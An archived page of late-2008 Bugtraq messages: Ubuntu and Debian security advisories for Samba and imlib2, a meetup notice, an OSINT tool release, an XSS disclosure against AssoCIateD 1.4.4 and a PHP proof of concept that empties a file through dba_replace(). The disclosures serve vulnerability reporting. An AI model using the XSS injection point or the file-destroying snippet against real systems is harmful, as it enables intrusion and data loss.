English | Deutsch | Español
 
Home ▼
Home About Us Contact Us Privacy Partner Programs Testimonials In Press Mailing Lists Abuse Developer APIs
Bookkeeping
Online ▼
Home Free Trial FAQ
Open/Create Company File Accept an Invite Order/Renew
Security
Audits ▼
Home Dedicated audits Advanced audits Standard audits Recurring audits No Risk audits Desktop audits Basic audit Security Seal FAQ Price/Feature Summary Order New Tests All Tests Confidentiality Vulnerability search Run Audit Scheduler IP Permissions Audit Configuration Editor Scan Queue Reminder Notification Schedule Seal Reports Reports Style Editor
Managed
DNS ▼
About Order FAQ Acceptable Use Policy Dynamic DNS Clients
Configure Domains Dyanmic DNS Update Password
Network
Monitor ▼
Enterprise Package Advanced Package Standard Package Free Trial FAQ Price/Feature Summary Order/Renew Examples
Configure/Status Alert Profiles
Research
Reports ▼
Home FAQ Glossary Archive
 Login/Register 
 
 Vulnerability   
Search   		     Search 324607 CVE descriptions
and 146377 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

===========================================================
Ubuntu Security Notice USN-680-1          November 27, 2008
samba vulnerability
CVE-2008-4314
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  samba                           2:3.2.3-1ubuntu3.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Samba did not properly perform bounds checking
in certain operations. A remote attacker could possibly exploit this to
read arbitrary memory contents of the smb process, which could contain
sensitive infomation or possibly have other impacts, such as a denial of
service.


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.3.diff.gz
      Size/MD5:   228354 f83899fe1c0310461296b328ad6bfd8a
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.3.dsc
      Size/MD5:     1902 bddef52582baae072593399147119e19
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3.orig.tar.gz
      Size/MD5: 23704996 c1630a57ac0ec24bc364c6d11c93ec35

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc-pdf_3.2.3-1ubuntu3.3_all.deb
      Size/MD5:  6261250 3cba32a86b765dfea7077fa0ef8a3672
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.2.3-1ubuntu3.3_all.deb
      Size/MD5:  7954632 af31dc4ce959b1a05be7944262bb460a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:   638612 859812590427a224dec70dc759d818c3
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  1968518 6ab7366368c73cb7f946a28e1d20ad2c
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  1370096 9582a74126b77e3f869f42e5c0379e6f
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:    88960 23c38ec3c526226430c1173f5c50ac47
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  3815516 e3c4879c048360a4daa5abccd509d029
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  1993296 0abd10cc0387017d20dfadfa24f190fd
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  5802316 417b6dca7b8e975b3acac82e4c58bf14
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  4908438 1f5a980c1c5d2f9d88ea3094299f5387
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  7173420 abba71e4d522228c21dc69192ab3cd54
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  1529316 51431c5d7a5f197af8afcc09517a399d
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  1112612 7cd0400093eb599cba999997ed5fae88
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.2.3-1ubuntu3.3_amd64.deb
      Size/MD5:  3349842 f7d99beef190cf414929348909a804df

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:   573952 859f986a3de794cf5ed27dd389ee5af4
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  1844424 30c0faf257433a05bfb52b9bea4865e3
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  1217612 a5a83d72421dbb1515664ede686c12b0
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:    87500 fd76021d354c819a59785feccc4d33ea
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  3459318 afe074065bb487232a2225bef9b190e3
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  2077272 acf1cad8b773d7ad2a72491c8d4422af
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  5161222 28214840e0f4335658d203c8746a6f94
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  4368894 1bf3bef3fbe5b302ec646a00d1c06bfe
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  6402702 d9e0653f05f4ec133e52560ee6f50946
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  1375852 8a134dc464ab4ffed997918f6b3206be
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  1006506 02f42b331a7fb36a0642a37cb1fe68b3
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.2.3-1ubuntu3.3_i386.deb
      Size/MD5:  2975264 11b04715205be1568369645b83e33636

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:   553626 f5c3dce8e75a3b2830c0060286302d16
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:  1769074 0982655253fa1150bc65aee04d3e8dde
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:  1160830 e9a8e86dd90a0002ccb11e4edba9361a
    http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:    86950 5820ad4178a4bcc540b450dc04a22249
    http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:  3328568 b2b7ad364090ad386190585312866a26
    http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:  2069634 1b7c75e44b5fc2e493e588973070437d
    http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:  4949830 c8521b495f15ed0bff9adbc14d60048c
    http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:  4197320 3f8e36ba5e4b1eea985592e29899b363
    http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:  6136768 72a65ce1b83ea7d47577bc6d5e0a2eda
    http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:  1317110 321bdeeb2b86304c127808ea96ec1c5a
    http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:   968290 4727bed25a79e31cad479372e2fc7642
    http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.3_lpia.deb
      Size/MD5:  2855842 fc0f25c386587abc402bbf21641c6d59

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:   606438 02c15552b12b7628b0b2aaf1489d639c
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  1730286 81ec2b2edd4b2bc80b0ef2840cb0a7d8
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  1255004 e01291af6798ff5c11a64b9787e8fdfc
    http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:    88902 14c7c4184eb595364872552e92969a68
    http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  3600158 08f75422765fc166c3b52d76e3ee3975
    http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  2058508 98110429e0addce3671bc3752687765b
    http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  5474700 fedc748ab8921bcab6a8c43f32dc1155
    http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  4639906 0a9141a34e4e7b4562ac9ac377b6f346
    http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  6653490 030bbc895d8cd8d6c7a77362d46cbf11
    http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  1417392 3a8a72968d94cd30997d9e7df003e4a0
    http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  1046090 e9e435264613362d54c3992811163638
    http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.3_powerpc.deb
      Size/MD5:  3122962 5796717921a7f8fc6ed4953f0060164f

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:   592598 f16838642c3e5671ae85740b83872e3c
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  2008144 aa0f3ceb8e34e4563c799e04d91503b5
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  1215988 3377b235769c891b5ad54ec0a92cc0e9
    http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:    87522 3ece3744e0724f32a9944f42f2e6ef74
    http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  3501358 fd3fcb79e4510295ca1e60e5d988143e
    http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  2007530 f70762bdf8e0d52ef368591208b3ed15
    http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  5327728 863297237833a73d8de68ab2f17d044b
    http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  4502036 47a9306d4265522b980ae835fd711697
    http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  6448006 8aeae36c0d511196a6bbbe3bfcf78370
    http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  1371010 777c03deb6f03eb87a500b95af21a5c6
    http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  1019660 95a8a0591ba092a066ce2789644ed538
    http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.3_sparc.deb
      Size/MD5:  3028816 eaae5c19dff7595cdc553106879621c7



--=-ATOrbRjUE+KJweMWF8u2
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkkurT0ACgkQLMAs/0C4zNprAwCfS9EmSnn7rED11SKj4TF9gu+r
1bAAoL+/Aaazb+9XscnLWTpDsO1Yj+TM
=WrIZ
-----END PGP SIGNATURE-----

--=-ATOrbRjUE+KJweMWF8u2--

From - Thu Nov 27 15:34:15 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004b89
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38774-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 7ECF2ECDFC
for <lists@securityspace.com>; Thu, 27 Nov 2008 15:29:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 7712A143755; Thu, 27 Nov 2008 11:50:29 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 21540 invoked from network); 27 Nov 2008 17:33:22 -0000
Date: Thu, 27 Nov 2008 10:36:20 -0700
Message-Id: <200811271736.mARHaKAR015348@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: tan_prathan@hotmail.com
To: bugtraq@securityfocus.com
Subject: AssoCIateD 1.4.4 Remote Cross Site Scripting Vulnerability
Status:   

=============================================================  AssoCIateD 1.4.4 Remote Cross Site Scripting Vulnerability
=============================================================
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : AssoCIateD
 VERSION     : 1.4.4
 DOWNLOAD    : http://downloads.sourceforge.net/associated/acid_1.4.4.zip
#####################################################


---------
   XSS
---------


[+] http://[Target]/[acid_path]/index.php?p=search&menu=<XSS>


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-27]

From - Fri Nov 28 11:14:45 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004ba5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38776-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 036DFECDEA
for <lists@securityspace.com>; Fri, 28 Nov 2008 11:11:38 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 9E211143ABE; Fri, 28 Nov 2008 08:09:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27459 invoked from network); 28 Nov 2008 12:21:55 -0000
X-Authentication-Warning: smtp0.thebunker.net: Host host81-149-215-163.in-addr.btopenworld.com [81.149.215.163] claimed to be [192.168.111.69]
Message-ID: <492FE5ED.6010808@pirate-radio.org>
Date: Fri, 28 Nov 2008 12:37:01 +0000
From: Major Malfunction <majormal@pirate-radio.org>
User-Agent: Thunderbird 2.0.0.18 (X11/20081125)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: DC4420 - DEFCON London - Christmas meeting  - Tuesday 2nd December
 2008
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV 0.94.1/8691/Fri Nov 28 00:09:03 2008 on livid.thebunker.net
X-Virus-Status: Clean
X-Spam-Status: No, score=0.6 required=5.0 tests=AWL,BAYES_20,RDNS_DYNAMIC,
SPF_NEUTRAL,URI_HEX autolearn=no version=3.2.5
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on livid.thebunker.net
Status:   

Yes, folks, it's that time of the year/month again...

This will be our last meeting of 2008, so we're planning to make it a 
goodun!!! All are welcome, but remember - Fight Club rules apply... If 
this is your first meet, you *will* talk... :)

We've got extended bar time in the upstairs bar at our usual venue, so 
we can carry on after the meet without having to relocate downstairs...

   http://www.beerintheevening.com/pubs/s/20/2081/Glassblower/Piccadilly

For those that haven't been before, we have exclusive use of the 1st 
floor bar from 19:00, talks start at 19:30, and there is food and real 
ale to accompany our excellent speakers...

This time we've got:

   - Bluetooth fun & Wargames - Christer & Mr K (long talk, double slot)

   - 'hacking rogue for fun & profit (mostly profit)' - freakyclown

   - Coring BlueCore - Mark

CFP is open for Jan/Feb meetings - please submit your proposals to me 
and/or alien (alien@alien8.org.uk)

I hope to see you there!

   http://dc4420.org

cheers,
MM
-- 
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

From - Fri Nov 28 12:24:45 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004ba6
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38775-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id DDB90ECDEC
for <lists@securityspace.com>; Fri, 28 Nov 2008 12:21:17 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 7F007143A8B; Fri, 28 Nov 2008 08:08:51 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9653 invoked from network); 27 Nov 2008 23:44:59 -0000
Date: 27 Nov 2008 23:54:44 -0000
Message-ID: <20081127235444.12197.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: cxib@securityreason.com
To: bugtraq@securityfocus.com
Subject: SecurityReason : PHP 5.2.6 dba_replace() destroying file
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ]

Author: Maksymilian Arciemowicz
http://securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 28.11.2008

SecurityReason Research
SecurityAlert Id: 58
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/58
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

NOTE:
These functions build the foundation for accessing Berkeley DB style databases. 

dba_replace - Replace or insert entry

- --- 1. dba_replace() destroying file ---
Function dba_replace() are not filtring strings key and value. There is a possibility the destruction of the file.

# cat /www/dba.hack.php
<?php
$source�a_open("/www/about.ini", "wlt", "inifile");
dba_replace("HOME","/www/",$source);
?>
# cat /www/about.ini
PATH=/
CURR=.
HOME=/home/
# php /www/dba.hack.php
# cat /www/about.ini
PATH=/
CURR=.
HOME=/www/
#

Well.
But, lets try use

# cat /www/dba.ham.php
<?php
$source�a_open("/www/about.ini", "wlt", "inifile");
dba_replace("\0","/www/",$source);
?>
# php /www/dba.ham.php
# cat /www/about.ini
#

Now /www/about.ini, is emtpy.  

- --- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314&

- --- 3. Greets ---
sp3x p_e_a Infospec schain 

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ]
Email: cxib [ a t] securityreason [d ot ] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)

iEYEARECAAYFAkkvKDcACgkQpiCeOKaYa9aRUgCgmsbU4uKeq1E+/yyIlQas9V14
e2MAoJobXQNRD8BNiDsHQYSNdOxIyQRc
=Tb8r
-----END PGP SIGNATURE-----

From - Fri Nov 28 16:14:45 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004ba7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38777-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E23CFECDE9
for <lists@securityspace.com>; Fri, 28 Nov 2008 16:06:06 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 39B86236F4F; Fri, 28 Nov 2008 13:54:14 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9622 invoked from network); 28 Nov 2008 20:26:15 -0000
Message-ID: <4930645F.30405@coresecurity.com>
Date: Fri, 28 Nov 2008 18:36:31 -0300
From: Jose Orlicki <jorlicki@coresecurity.com>
MIME-Version: 1.0
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com,
pen-test@securityfocus.com
Subject: [tool] Exomind v0.2 is out!
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   


What is Exomind?

Exomind is an experimental Python console and programmatic framework for
building decorated graphs and developing open-source intelligence
modules and ideas, centered on social network services, search engines
and instant messaging.

Tool:
http://corelabs.coresecurity.com/index.php?module=FrontEndMod&action=view&type=tool&name=Exomind

BA-Con 2008 slides:
http://corelabs.coresecurity.com/index.php?module=FrontEndMod&action=view&type=publication&name=LeakedOut%3A_the_Social_Networks_You_Get_Caught_In

Project:
http://corelabs.coresecurity.com/index.php?module=FrontEndMod&action=view&type=project&name=Exomind

Thanks!
Jose.

Corelabs
Core Security Technologies




From - Sat Nov 29 13:14:45 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bac
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38778-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 32237ECECB
for <lists@securityspace.com>; Sat, 29 Nov 2008 13:11:37 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B0699236F46; Sat, 29 Nov 2008 10:59:27 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19871 invoked from network); 29 Nov 2008 02:13:24 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Date: Sat, 29 Nov 2008 03:28:21 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20081129022821.GA17875@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 212.202.236.178
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1672-1] New imlib2 packages fix arbitrary code execution
Priority: urgent
Resent-Message-ID: <Xghq7Jo5jeP.A.UoG.bjKMJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sat, 29 Nov 2008 02:28:43 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1672-1                  security@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
November 29, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : imlib2
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2008-5187
Debian Bug     : 505714

Julien Danjou and Peter De Wachter discovered that a buffer overflow
in the XPM loader of Imlib2, a powerful image loading and rendering
library, might lead to arbitrary code execution.

For the stable distribution (etch), this problem has been fixed in
version 1.3.0.0debian1-4+etch2.

For the upcoming stable distribution (lenny) and the unstable
distribution (sid), this problem has been fixed in version 1.4.0-1.2.

We recommend that you upgrade your imlib2 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

